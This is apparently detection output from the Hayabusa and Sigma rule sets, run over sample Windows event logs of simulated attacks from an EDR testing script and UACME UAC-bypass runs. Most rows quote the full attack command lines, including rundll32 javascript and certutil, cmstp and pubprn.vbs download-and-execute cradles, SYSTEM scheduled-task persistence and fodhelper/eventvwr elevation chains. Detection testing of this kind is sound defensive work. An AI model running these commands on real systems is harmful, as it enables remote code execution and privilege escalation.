2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1    :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe  -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1    :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe  /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf  :  Path: C:\Windows\System32\cmstp.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe  :  Path: C:\Windows\System32\forfiles.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe""  :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c winrm qc -q   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript  //nologo ""C:\Windows\System32\winrm.vbs"" qc -q  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript  //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""}  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc  :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: schtasks  /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  34  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C:  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  33  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe""   :  Path: C:\Windows\System32\fodhelper.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe""   :  Path: C:\Windows\System32\fodhelper.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  32  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  30  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe""   :  Path: C:\Windows\SysWOW64\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe""   :  Path: C:\Windows\SysWOW64\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80  :  Path: C:\Windows\SysWOW64\WerFault.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
